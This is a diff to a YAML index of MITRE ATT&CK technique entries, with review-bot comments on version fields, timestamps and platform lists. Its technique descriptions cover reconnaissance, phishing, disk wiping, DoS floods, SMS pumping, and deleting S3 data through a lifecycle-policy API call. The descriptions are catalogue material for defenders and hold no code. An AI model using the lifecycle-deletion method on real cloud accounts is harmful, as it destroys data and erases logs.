+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -93147,6 +93827,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -93169,6 +93853,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -93176,9 +93864,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -93237,7 +93924,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -93257,7 +93944,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
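Review bot: `x_mitre_attack_spec_version: 2.1.0` stays on T1595.003 here (and on T1590.001 in a hunk near the end) while `spec_version: '2.1'` is removed, so after this change the index mixes objects at attack spec 2.1.0, 3.0.0 and 3.2.0 with no per-object STIX spec marker. That mirrors the upstream objects, but any tooling that validated this index against one spec version needs to tolerate the mix. The preceding hunk's `modified` for this object also moves backwards (`2022-05-24` to `2022-04-15`), the same regression noted for T1591.002.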
@@ -93279,7 +93965,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -93295,12 +93981,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -93369,7 +94053,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -93417,31 +94101,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -93450,19 +94115,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
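Review bot: the T1595.001 hunk rewrites almost every key of the technique object only to reorder it (x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and the whole external_references list appear as removals in the previous hunk and come back here in a different order), which hides the real changes. The substantive ones I can see are x_mitre_version '1.0' to '1.1', 'Network Traffic: Network Traffic Content' added to x_mitre_data_sources, the new x_mitre_contributors entry, the explicit x_mitre_deprecated/revoked flags, and x_mitre_attack_spec_version going to 3.2.0 while spec_version is dropped. Please have the generator emit keys in a stable order (sorted, or the order of the source STIX object) or state in the PR description that this is a full re-serialisation from a newer ATT&CK bundle, so reviewers can diff on values alone.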
@@ -93520,7 +94207,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
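Review bot: this T1590.001 hunk drops spec_version but leaves x_mitre_attack_spec_version at 2.1.0, while the neighbouring T1595.001 object is moved to 3.2.0. If the file is regenerated from a single ATT&CK bundle, one object staying on the old spec version suggests it was not re-synced; please confirm the source bundle version or regenerate this entry as well.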
@@ -93541,7 +94227,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
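Review bot: the modified timestamp for T1596.005 moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:49:49.260Z', and the same regression appears further down for T1591.001, T1598.001, T1491.002, T1499.001 and T1561, where every old value ends in the same 14:00:00.188Z pattern. That looks like the old values were batch-stamped rather than copied from the STIX objects, so the new ones are probably correct, but please say in the PR description which bundle the modified fields now come from, since tooling that treats a decreasing modified as a stale import will otherwise skip these entries.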
@@ -93557,8 +94243,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
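Review bot: after this hunk T1596.005 carries neither spec_version nor x_mitre_attack_spec_version (both are removed and nothing is added), whereas T1595.001 receives x_mitre_attack_spec_version: 3.2.0 and T1590.001 keeps 2.1.0; the same removal without replacement happens below for T1591.001, T1598.001 and T1491.002. If the attack spec version is meant to be optional, consumers of the index must tolerate its absence; otherwise these objects should get the 3.2.0 value like the rest. Either way the file should not mix three states for the same field.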
@@ -93584,7 +94268,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -93600,8 +94284,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -93625,7 +94307,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -93647,13 +94329,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -93745,13 +94425,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -93760,7 +94439,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -93777,17 +94455,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
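Review bot: this T1498.001 hunk removes Azure AD, Office 365, SaaS and Google Workspace from x_mitre_platforms, leaving Windows, IaaS, Linux and macOS, alongside the x_mitre_version bump from '1.3' to '1.4'; T1499.003 and T1499.004 receive the same trim later in the diff. Since the per-platform index CSVs are derived from these platform lists, please make sure the indexes for the four removed platforms are regenerated in the same change so they stop listing these techniques.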
@@ -93812,7 +94485,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -93850,7 +94524,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -93884,12 +94558,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -93954,42 +94626,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
- technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ T1485.001:
+ technique:
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
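Review bot: this hunk reads as if T1499.003 were deleted and replaced by T1485.001 and T1496.003, but T1499.003 is re-added at the end of the hunk with its keys reordered, so the actual change is two new sub-techniques plus a move; that is worth stating in the PR description. On the new entries themselves, both T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping) arrive with x_mitre_detection: '' and atomic_tests: [], so any index consumer that expects a non-empty detection string needs checking, and the only detection hints in the objects are their x_mitre_data_sources ('Cloud Storage: Cloud Storage Modification' and 'Application Log: Application Log Content'). A follow-up issue to track atomic coverage for the two new IDs would be useful.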
@@ -94000,13 +94757,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -94014,12 +94778,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -94080,109 +94865,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
